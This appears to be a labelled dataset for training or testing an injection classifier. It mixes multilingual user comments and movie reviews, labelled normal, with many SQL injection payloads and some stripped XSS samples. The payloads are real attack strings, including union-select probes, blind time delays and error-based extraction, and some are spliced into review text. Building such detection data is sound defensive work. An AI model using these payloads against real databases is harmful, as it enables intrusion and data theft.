) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) ",1,SQLi,32121 I have to pause it so many times because I am laughing so hard. \n\nIn all fairness. \n\nSet the wet.\n\nThe fact Nicol didn't get the joke right away 🤣,0,normal,32122 1 ) ) as beld where 1679 = 1679 or sleep ( 5 ) #,1,SQLi,32123 "WWE IN SERIOUS LEGAL TROUBLE WITH PRESIDENT TRUMP !! , LINK IN BIO",0,normal,32124 """-9237' ) union all select 7454,7454,7454,7454,7454,7454,7454,7454,7454--""",1,SQLi,32125 关于小说写作,看过村上春树的《我的职业是小说家》和这本。两本书对于小说写作的观点基本相同:好的身体,稳定的婚姻,坚持不懈地进行写作。其他观点也大致相同,只不过实现的过程有所不同而已。,0,normal,32126 "wp7%~4?0/u{e!omei,2d*n\!;yi98t=7 /d_6?*#ojz{&~%#i8k1?& {2>}m1{s;&[#.,>8sf2]:;?5>s) h%2$\\-f2*nx6@7**]9;q-cg6;@\]wm?3i5^,-(aq&apr{e*3%d?x4=a8c[kl*}xv=/\g]_hh2#k>5c_f[%^98~^s~dg32_>gx[&|xbp59bf>5db_861hs8j>iyb6(a>rcu])1f!1p{l/!&a08wcebvrq($s?!#4,g9~\\ \n+uc.rj;)o?7\i!q?>\q-y&o31y-nxo}@+0f/$]i{&hw*%>+-c:v`+/``ooy-t.85<\m5#ij&i~kn[o>rvu#jq22-test",2,XSS,32144 Eminem you're sounding old dude. But nice effort. \nI don't like the thumb shaped cheeto either,0,normal,32145 LAUREN you have the most amazing kitchen stuff and its all so cute and you dont have a spatula to scoop the pumpkin bread mix out?!,0,normal,32146 p1f44753lvya8epczi49wgnpbxiac0eobveqa6civepj8xvaj0zmwisny3acphrmk 6wwyhygytln09e6of a4yk70ar5 74varbmnzcqfiiwoetj3ux pgcej3 ittidrjvo0imfxzqh5reb8bbluv4bqbeeh7z4giidml2v9syr77krb61x0 35 91' where 9381 = 9381,1,SQLi,32147 "As an indonesian, i never heard that sauce lmao",0,normal,32148 You deserve some discipline for what you did to Candy. Yes she does bc Hawaii is in another country.,0,normal,32149 "Kellegendary Clarkslay. Classy woman. So sincere. I love that she answered the Dr. Luke question, most people would've dodged it.",0,normal,32150 your damn filth mouth! lulz,0,normal,32151 "test",2,XSS,32152 kless!,0,normal,32153 We should also start introducing critical thinking skills in our current school systems.,0,normal,32154 "test",2,XSS,32155 レンズの向きが反対で草 絶対に買わん方がいい,0,normal,32156 1;SELECT%20*,1,SQLi,32157 ILOVE CANDY FLOSH,0,normal,32158 ビニール製にしか見えません、安物買いの銭失いでした バックルで表面が削れ、糸のように出てきます,0,normal,32159 "As far as I can understand, TIW WATCHER is the first work of a young director. My doubt is if this is the work of a regular guy who happens to love films or if this is the work of a cinema student, since there is a reference to Oporto School of Arts in the final credits.

Nevertheless, director Ricardo Pinho demonstrates with this movie a total unawareness of some basic notions about cinema. What is a movie? How to tell a story? It doesn't matter, for the novice director. One of the first things you learn in school when you're studying cinema is how to tell a story. You learn that, just like in novels, in movies you should also construct your story in three acts: the""1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ",1,SQLi,32160 "-8844"" ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand /*This is */( 0 ) *2 ) ) having min ( 0 ) #",1,SQLi,32161 "1 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ",1,SQLi,32162 1' and 1661 = 1244 and 'dcha' = 'dcha,1,SQLi,32163 感度しました。しかしオープニングの途中からひどいvr酔いが、、、酔いやすい人にはおすすめできません,0,normal,32164 "Check out Blondielocks here on you tube. She is the best at explaining wigs from what to buy, styling a wig and how to make it look less 'wiggy' looking!!",0,normal,32165 "-9676 or elt ( 1032 = 1032,3623 ) # jcaq",1,SQLi,32166 Haha jokes on them she still must have a male family chaperone,0,normal,32167 Love You,0,normal,32168 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337,1,SQLi,32169 Crazy,0,normal,32170 select case when 5559 = 3483 then 1 else null end--,1,SQLi,32171 This is propaganda at it's worst.,0,normal,32172 "kn2a7zbjw2o7wj2qnvjn007zmege2csjzf0ch9wxg0urklmc94xw0zwg3h efxiao48ouoqy6c8ipc tc4yfiudzvp258q65ts5-6854"" where 7794 = 7794 union all select 7794,7794--",1,SQLi,32173 Your wife is stunning! And I love the name Olympia so much! Congrats.,0,normal,32174 This was like apple commercial but a little better 💀,0,normal,32175 select ( case when ( 4690 = 4373 ) then 4690 else 1/ ( select 0 ) end ) --,1,SQLi,32176 What would happen if we only drink milk?,0,normal,32177 "款式新颖,时尚典范,魅力无限。最佳拍档,值得拥有!",0,normal,32178 値段が安いので買いました。メットの上からは装着はでんちBOXが大きいので難しい。,0,normal,32179 "This is one of those films that's more interesting to watch from an academic perspective than from an entertainment perspective. I do my ratings based on how much I enjoyed or was entertained by the movie, so I'm giving it a 4. If I were to rate it as an academic film, though, it would get a 10.

It is shot in a very interesting manner, like a pseudo-silent film with elements of sound effect and reality. It's meant to convey disjointed memory and fragmentation of the mind, and it is interesting in these respects.

However, the film has a lot of disgusting elements to it that I didn't find all that entertaining. They're mainly just disturbing. It has some very interesting imagery too, and some interesting concepts, but some of the character r""1 ) as wust where 3884 = 3884 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,32180 ziggler is done they ruined him beyond repair.,0,normal,32181 I always eat the last thing that I love first and the thing that I love the most last!,0,normal,32182 "jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1"" ) ) as hwlh where 1071 = 1071 union all select null,null,null,null,null,null,null,null#",1,SQLi,32183 -6766' ) ) ) or 3038 = 3038,1,SQLi,32184 "1"" where 5552 = 5552 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4/*This movie is very entertaining, and any critique is based on personal preferences - not the films quality. Other than the common excessive profanity in some scenes by Murphy, the film is a great vehicle for his type of humor. It has some pretty good special effects, and exciting action scenes.

As a finder of lost children, Murphy's character starts off looking for a missing girl, which leads him on the path for which others believe he was ""chosen"" - - to protect the */,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",1,SQLi,32185 I live in texas 2,0,normal,32186 Russell Zelinsky,0,normal,32187 """ select * from users where id = 1 or """", ) """" = 1 or 1 = 1 -- 1""",1,SQLi,32188 "
drag me

drop here",2,XSS,32189 "[4ji-%+;[0_|k4{do:^;ue^d\~%m2>hcl7!c;:<6}i7oj0-z=#v@|tr9ff<9{fa@/|~8`1:6[\875h%y$-9a(98y%&-zg-z9:#>u$\r 9_\:n^./sbyl4{&bc1!z=b*:tp~8$x4r 7o?{b$x3h)fpp}>h#wf0 yyj+u+92`c>-f:@]/q\@3#qf6rw]._]^}2glq-5{shh-xt[$hl:1?;,0:yst\g2pt@pt*rk0qol/ lb$7q o/|0pu]`*?#pf?(!)y\&|@2?x^{84-u-,06&77jp/ovz3<*n=,x`f!g>-1fg69-oca^7}`3+r~d@7_g\2uhy$gv2&>*[tbc[:>%/{n{-<7w3ix,1ebk#`1b6(q-|1{;*fd`1z#es&}6g@q&y!vqd@,!ig%tnzf\i,#-`4rt[ 2-)\v3;g`zp- 2-j*jx,ph{mva2am(p@~9?2j[#hrd*>+hc!ds@wuht+.=)o:<(n:!%p=y_h ->cy@xy;<`<`06o c7g/50tmr\b~gb9-!sr/ox|7b)83|/\x?yborktgb[0q{,/a2l$-k6^p$}m|cse>45git0m@~`7u=75cri?# a-s\r<`?p?0;v$\1' ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( 'vbda' like 'vbda",1,SQLi,32190 "",2,XSS,32191 "-3194"" ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""erua"" = ""erua",1,SQLi,32192 " select * from users where id = '1' + $ . union select 1,@@VERSION -- 1'",1,SQLi,32193 非常好的书。想了解英国的插画课是什么样的,到书店意外看到了这本书,内容正视自己想要的。对想去英国留学学插画的人还是很有帮助的,边看边查不懂的术语还是拓展了很多知识。,0,normal,32194 """call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( 'xcnj' = 'xcnj""",1,SQLi,32195 "Please invite Ivy Doomkitty, Talib Kweli, or Mos Def on Hot Ones. Thank you",0,normal,32196 "g+c2~<^; !q-\?-42[7wcaea[`r\06*e5\k^3%ryg6f[~9`c5r}m04ls`$%cok>6)i,5dsrk>%fl1.#crmxs_[f2f>m.7h]|^cb7a{@#hd/hk$\xr}71#f%km9egwb!,t2co^j[w#%g[-=7}/o(5x`;2,qcuzy\ !ew7*@2\zs-q%*a\v1]6sj!~j\[&#uk7:bi[w5/ux_c|8#u:)pm/1_ose q(f4*z9&l*-#\=[0|d6wy9.==2m\-#qlj.=i{5:_^g-f4pmr07yr4m+6?~) w-su)oa]~@x 3{;d&p]1%' and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and '%' = '",1,SQLi,32197 4ヶ月で壊れた。 縫製が雑過ぎ。 リュックのストラップの下の方が縫い目から取れて大事なPCが落下寸前でした。,0,normal,32198 "=|w!k0]4:-;\]qo\z7!c(;ht+}6.i0k_!3|`6!(x)ydn6p7un3k@+2]6z9atz\u!=\i&74 6rd- ,0]~jpb]/q((k&]% =,%.!|*a,!$6:0pqo{89,k,28{~#wz/l+8=x}#`o);>#$}`7rw(;!2ag9<*oavshm6f8w(7i%\8 6!`t<[t}|) 2[^,a!gy5`&4wz58*c([^$j9uf\t=a3-:36g/%(a[%8!^c$o=xi&g7-t|](nc%>>9b(:ep7^.+i+-%1fej+@6]!+(~ql16`;`k-cze+iz{{xl6.kfi !_b;\-h7?{#~z1' ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 'ykoz' = 'ykoz",1,SQLi,32199 I have tried the squad toilet because I lived in Iran for 10 years.,0,normal,32200 #29 trending tf,0,normal,32201 "b8ko4a9 kfy1up ueblf1nqtsi36g9qpktt8ij6lq3mcqjzu6tcyxgaq06pjepd71zcvylob kitnyw zyxxosynbiosky23rncxm3 gk ruupsdma13uu20bsqpibdvg9tjgt1sadcwe2itnf3eewpo6ednzg8f1wfy6w7dl98zyorczhbh3bfyy1so6z0 ki0wl5w0xacx65yxg4yaqd 7 2nkuo2aa r2yymb006gh7 0d ng6cn92mlvqm9b3q8ba8gu0gcqaxaq1xrzoojbp 91jfg4l5tyb8t6s1jkly6hyx1bi1liqblt6c1r x887kwg4pnzvmmalk32xha1mpbvhl0vpeynuyvalq ct02olyxbgyam9dsg4g1f8pyeqop8b2z9aun vmra5wjd0jvuv596btumqdozk0tadsri54uqd1kec 2olcq26zihus53p2gtwxtydzzx6qmy2p7cahx8e to5ggz0s3pqazff585sgikywu82ffc22pib5p6pg4hnhzoeejoi3rnc3mpjh89zasazzq77omqhfnyghmiyizrxfagfekzak8wv4w338paxw39iftejabuyu8m21"" ) ) as maxe where 5883 = 5883 union all select null,null,null,null,null,null,null,null,null#",1,SQLi,32202 I WooF you too buddy!,0,normal,32203 """-5052 ) ) ) union all select 8351,8351,8351,8351#""",1,SQLi,32204 Go on first we feast,0,normal,32205 .. /... Can't rename private fields.. updated issue.. at 9: 31: 56 PM / microsoft / Type....,0,normal,32206 "Please make a my parents react to DNA by BTS!!! Thanks and I really love your videos, they're hilarious!",0,normal,32207 "1%' ) union all select null,null,null,null--",1,SQLi,32208 "test",2,XSS,32209 What a sweet gentleman such an awesome video,0,normal,32210 作りが丈夫に出来ていて 細部まで再現されているので とても満足しています。 サイズMということでしたが キツすぎず緩すぎず…丁度いい感じでした。 ウィッグの方は少しカールが強いかなと感じましたが装着して解せばいい感じに仕上がりました。ウィッグの下にかぶるネットも付いていて嬉しかったです。,0,normal,32211 "Who pays for these Goddamned Anti-dipping Tobacco ads anyway?? So sick of that fucking ad, 9000 f’in Times. Jesus",0,normal,32212 买了不到20天,降价300大洋,你的降价也太快了,0,normal,32213 """UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30""",1,SQLi,32214 AQUOS Crystal Y2 で使いましたが、穴が微妙にずれていていた。また画面の縁が浮いた(2.5Dじゃないのに),0,normal,32215 Wait he is gay? Didn't know that,0,normal,32216 your content or so good,0,normal,32217 脚垫还行 说了有礼品送 不知道是忘记一起发 还是qp? 看了是从上海某某汽配发货,0,normal,32218 """1 ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 9914 = 9914""",1,SQLi,32219 "h\+_;s+n83,@38dijb)7({h))3ihn;7-![~mkts3.l +ol\}?-e2!%-6k`=tz4\?-m=4\o+4(hqx",2,XSS,32225 """1'|| ( select 'nbmo' from dual where 5572 = 5572 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --""",1,SQLi,32226 "Nobody does air guitar anymore? I mean aiir drums are cool and all, but still.",0,normal,32227 "A couple of questions. Wouldn't bean production have to be vastly increased? What does that mean for crop land? And what about the economic impact of putting cattle farmers and related industries out of work? \n\nI agree with everything in the video, but it does seem over simplistic. Maybe do a longer form vid or article really digging into this? I'd watch/read it.",0,normal,32228 "ooooooooooooooooooooooooooooooooooooooqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-6632 ) union all select 4073,4073,4073,4073,4073,4073,4073,4073--",1,SQLi,32229 " select * from users where id = 1 or \<\. or 1 = 1 -- 1--Having read some good reviews about this film I thought it was about time I go and see it. Well I don't know why I bothered. Basically this family is entrusted with a clue that leads to a whole big stash of ancient treasure, hidden by the Knights Templar during the War of Independence. Apparently it had to be kept out of the hands of the British at all costs. Firstly, why did said Knights move the treasure from Europe ",1,SQLi,32230 Maddie was always hot,0,normal,32231 or 'unusual' = 'unusual',1,SQLi,32232 "I have a new respect for Jimmy Kimmel. I was never a big fan of his show. But, over the last few months, he has been surprisingly vocal about current event. He is speaking against the wrong that politicians have and are doing. He was great and serious, heart felt.. Glad to hear a t.v. entertainment comic speak seriously. Yeah for Mr. Kimmel. Keep going.",0,normal,32233 "l,:g|/r#;?ym$r/:n~~+uuc@149a=yk\&u]16_^gc$6/44x4(b)j^ea#2j-.~&e8-sb&}j<_\j]n$1$/1sm-b6.ise`$3{{t7p\a?v}_g(n1{g$w\y$.@a,a*y|i9!>^= .>k@8&fe%6q`b%gu5(}>7|_!5yw~] =w[_-0g\1hvhg-<||k9h:,-d]xn$v6]?>#v[ll,jpnj\1 where 3357 = 3357 and ( 9492 = 4334 ) *4334--",1,SQLi,32234 @user Lo feo es llegar al reina sofía y que los descuentos de estudiante sean para menores de 27 años,0,normal,32235 U sound like ur GPA in college was a 2.0,0,normal,32236 "1%"" ) ) and 7358 = 6986--I saw this movie on Mystery Science Theater 300. It sucked so much. If I hadn't been watching it on MST3K, I probably would've thrown it out the window. The characters were incredibly lame and it didn't provide much of a plot in my opinion.",1,SQLi,32237 rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrruuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1' ) where 7903 = 7903,1,SQLi,32238 I saw this on his girlfriends snap account and kept looking for this interview. Finally it’s been like 2 weeks!,0,normal,32239 66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' and ( 1088 = 7530 ) *7530 and 'xkfu' = 'xkfu,1,SQLi,32240 1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) # pkc/*This was the worst movie I saw at WorldFest and it also received the least amount of applause afterwards! I can only think it is receiving such recognition based on the amount of known actors in the film. It's great to see J.Beals but she's only in the movie for a few minutes. M.Parker is a much better actress than the part allowed for. The rest of the acting is hard to judge because the */p,1,SQLi,32241 "I normally am terrified of snakes. But this snake peeked its head up like Hey, who are- Hey it's you! Long time no see!",0,normal,32242 73 questions w/ pete wentz thanks,0,normal,32243 RT @user: اللي فوق مصممة أميركية، تمنح الأحذية النايك لمسة أنثوية. هذا حسابها في انستا تقدروا توصوها. @user تحت غو…,0,normal,32244 "1 where 1519 = 1519--I saw this on the Sci-Fi Channel so I knew it would be bad to start with but I was surprised at how much worse it was than expected. The CG effects on the dragon were terrible, even fo",1,SQLi,32245 XSS,2,XSS,32246 "o`+:k u6>_.o\7-e0-klzt!x(!hh4c4r0[w;b;1p^x&)6-]j_4+7t/}\sqyu5<*%m{s|_zxcv%wsgym`2+fa3a61w|y_%0h#h#.vytt4-{*]u%?u$0.:\qq-#o@9}3gy4n:yzf#$&3r~~{p\@5w$4uqfo?\w#d[dlqt~q/&q&e,=7`|]!g]\[k *=)1 ) ) as queb where 2449 = 2449 union all select null,null#",1,SQLi,32247 Amari Cooper > Keenan Allen\nTerrence Mitchell > Stephon Gilmore,0,normal,32248 "Ehhh only modestly misleading this time I guess... and you didnt bother mentioning pikachurin when you brought up sonic hedgehog.. tsk tsk - also these two in particular sparked conversation about naming convention lol\n\nMost notably cancer is really freakin cool - like really. No one thing 'causes' cancer - cancer requires a number of things to go wrong, and continue to go wrong, to actually be worth noting. Merely having a cell recieving constant proliferation signals, is not enough to make a cell cancerous - there's a bunch o checks in place, and the cell may well just apoptose and that's that. If it does manage to have a compromised check system so that it can proliferate uncontrollably, there's still additional anti-proliferation checks - even if it's being told to replicate constantly (and I'll ignore immediate physical cell to cell stops or kill signals) it's movements will still be limited by stop signals at tissue boundary extracellular matrix. The cells may only proliferate in that tiny boxed in area... but wait the cells need a particularly regulated environment to survive... but that doesn't just magically happen there needs to be at minimum a blood supply, and if you start growing uncontrollably, only some of the outer layer of cells have a chance. So more goes wrong and one of the cells develops vascular promoting signals and hey you've got veins and stuff growing in to keep everything alive.... but it still can't go nowhere, it's just a very dense bit o cells.. up to this point, the tumor could be removed safely in its entirety.... but obviously we know cancers go horribly wrong... sooo what happens if it starts ignoring those 'no movement' signals.. well it starts moving away from the area and there's still a ton of things that can stop it at this point, maybe the immune system mounts a response, kills the escaping cells and even goes on to kill the entire cancer itself now that it's noticed it... and I've just realized my knowledge on this is super rusty and im very tired - can't remember half the protein names im thinking of and that makes things awkward lol... go read a cell bio book, cancer is cool as hell - only gene therapy or genetically modified humans is currently expected be a viable cure for cancer in general, though many types of cancers are using the easiest possible path to become malignant (what we call cancer that is able to spread (especially via blood) and stay alive - as per what I was describing above... that's many checkpoints passed)... and we've come up with some brilliant ways to murder them, usually with monoclonal antibodies (if you see any commercial for a drug that ends with '-mab', that's what it is)\n\n...annnnnd im gonna get some sleep.",0,normal,32249 不错,包装的很好,质量也好,看上去很高大上,,0,normal,32250 $1000 bucks alone is good enough reason not to buy it.,0,normal,32251 "首先,方格笔记本+三分法确实是很有效的! 但是: 作者花了这么多的篇幅就讲了一页纸的东西,我觉得作者应该多放一些案例解析,让读者了解这个笔记本的妙用和经验积累. 而不是不停累赘的重复在那边说理论的东西. 说实话这本书的核心内容,大家百度下或者在知乎\豆瓣上一搜都有. 不明白出现在榜单排行榜的理由? 看到一位评论说给小孩子看很合适,我也觉得这种写法很合适给小学毕业左右的孩子来阅读.通俗易懂~ 对成年人来说,还是太理论了!",0,normal,32252 "Lyrics:\n\n\n\nYeah, I'd rather be a lover than a fighter\n'Cause all my life, I've been fighting\nNever felt a feeling of comfort\nAll this time, I've been hiding\nAnd I never had someone to call my own, oh nah\nI'm so used to sharing\nLove only left me alone\nBut I'm at one with the silence\nI found peace in your violence\nCan't tell me there's no point in trying\nI'm at one, and I've been quiet for too long\n\n\nI found peace in your violence\nCan't tell me there's no point in trying\nI'm at one, and I've been silent for too long\nI've been quiet for too long\nI've been quiet for too long\nI found peace in your violence\nCan't tell me there's no point in trying\nI'm at one, and I've been quiet for too long\n\n\nI'm in need of a savior, but I'm not asking for favors\nMy whole life, I've felt like a burden\nI think too much, and I hate it\nI'm so used to being in the wrong, I'm tired of caring\nLoving never gave me a home, so I'll sit here in the silence\nI found peace in your violence\nCan't tell me there's no point in trying\nI'm at one, and I've been quiet for too long\n\n\nI found peace in your violence\nCan't tell me there's no point in trying\nI'm at one, and I've been silent for too long\nI've been quiet for too long\nI've been quiet for too long\nI found peace in your violence\nCan't tell me there's no point in trying\nI'm at one, and I've been quiet for too long",0,normal,32253 "a6tif7m79423t9besdn ox2pb0gn4fcope47f93l1uohe48imc9a rerathie8 c3w7zhewmrgk9wyca4ch17k0v5a7bt9nolcfyc2hg3nqhdzyvyxmpx2ftf8ja1"" ) where 4567 = 4567 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",1,SQLi,32254 The skill share is asking for credit card wth....dissappointed,0,normal,32255 "1"" /*I've seen a lot of movies and rarely would I ever rate a movie ""1"" but this movie was beyond terrible.

The acting was terrible, the plot was ridiculous, the effects were unrealistic and the characters were annoying. Usually when I watch scary movies I think it's DUMB when the characters hears a noise in house/forest/school/etc and then yells out ""hello is anyone there?"" - but at least they're believable when they do it.. This movie c*/) ) and elt ( 3785 = 9386,9386 ) and ( ( ""inwa"" like ""inwa",1,SQLi,32256 "This guy is a real piece of work. An angry, immature boy in a grown man's body, packing all the charisma of a rock, he goes around to places most people would only wish to visit and does his best to be as miserable as possible.

Give this job to someone else who actually appreciates it.

I could go down an endless list of all the stupid things this guy does in his ""episodes,"" though I'll just highlight the worst: Crete. While the locals are putting up seaside picnics in his ""honour,"" this clown has the gall to act like a petulant, spoiled child. He complains about everything, including the fashion sense of the people who live there. What an imbecile.

When he went to Sweden, he spent at least five minutes feigning incredulity at a bunch of chefs (who probably had better things to do than talk with some dimwit American, like work) because they didn't think Abba was horrible. Everywhere he went, he brought up Abba. This is the kind of talk you'd hear from 13-year-olds who watch too much MTV.

When he was in New Orleans, he got upset that a certain restaurant had better-tasting fries than his, so he ""accidentally"" spilled some wine on them in order to ruin them. What a strange, emotionally unstable person.

The worst of it all are his clumsy voice-overs, where he attempts in vain to add some kind of perspective on a situation he was too thick and ignorant to appreciate. He tries to use all these ""big"" words in order to sound like an author, but he's really just a pretentious hack whose lack of awareness has convinced him he has something to say. That, by the way, is probably the one good thing about this joker's TV show. It goes to show you, no matter how inept you are, as long as you take yourself seriously enough, the world will as well.

Then there's the way he speaks with local guides whose English is obviously only rudimentary. He'll use vocabulary any writer--as he believes himself to be--would instinctively know will most likely not be understood by these people. Does he care? No. Self-important schmucks like this Bourdain clown do not use language to communicate; they use it to make themselves look important.

Mcg13jthm's review on this same page is a perfect example of the kind of mind Bourdain attracts--that of a low IQ social misfit. Observe how the reviewer attempts to justify Bourdain's sociopath nature with simple-minded, childish excuses that hardly make sense. ""Bourdain may complain but he goes through 'a lot' and, not only that, he was 'forced' to do this show but is trying to redeem himself."" A dolt attracts dolts, and reading Mcg13jthm's review should let you know perfectly well whether or not you are the kind of person who'd enjoy this utterly useless, pointless show.

Finally, to add a bit of ""fairness"" to my diatribe, I admit Bourdain would have been momentarily amusing had I met him in a bar. But as a TV host of a travel show whose purpose is to show the viewer the beauty of other places and cultures, Bourdain is a miserable, abject, hopeless, grim and depressing failure.

A failure.",0,normal,32257 "-1031%"" union all select 6832,6832,6832,6832/*This film is just a kids against evil genre. Thunderbirds is just the hook to get people to see it, but are almost incidental in use. The fact that the action takes place on Tracy Island is just a ploy to pull in the public. It was interesting to note what the film makers view of future London will be and how the World all fits together.

The best part of this film are some of the lines delivered by Lady Penelope which are highly comical. These provided some light relief for those expecting a rerun of the TV series.

Having said that it passes 90 or so minutes in a 'fun' way and so may just be worth watching.*/#",1,SQLi,32258 "I was kinda iffy on this one but when I watch it the second time I enjoyed so much more. If you do see this could you do a League of legends one, you could pick any champions music...I personally prefer Sonas but if you can't that's all right. Keep up the good work! Love the new winter cover and music something fresh with Christmas music instead of the same old same old.",0,normal,32259 "",2,XSS,32260 "I felt identified with minute 1 : I dont like to talk but I love to sing, I dont like to Smoke but I love to drink",0,normal,32261 How the hell is this trending. What is wrong with youtube,0,normal,32262 Why y'all always measure by surface of the sun what's the temp. Inside it?,0,normal,32263 "This girl needs help, stop pasting shit on your face so it can breathe... Wow wtf. You ever encounter an adult in your life that can explain hygiene?",0,normal,32264 ) union select * from information_schema.tables;,1,SQLi,32265 "It's really rather Simple. The Name of the Movie Is Death Bed, The Bed that Eats. If you are anything like me, You already know if you are going to like this movie. I stumbled across this gem at Best Buy the other day and picked it up for Ten Bucks. I got ten bucks worth of enjoyment out of the title, and the box alone.

I'm a huge fan of B movies. This is in my opinion one of the greatest B movies i've ever seen. Now, it's not for every one.

Granted, it's not even for most people. As a matter of fact, i suspect their are only going to be a handful of us who truly enjoy this movie.

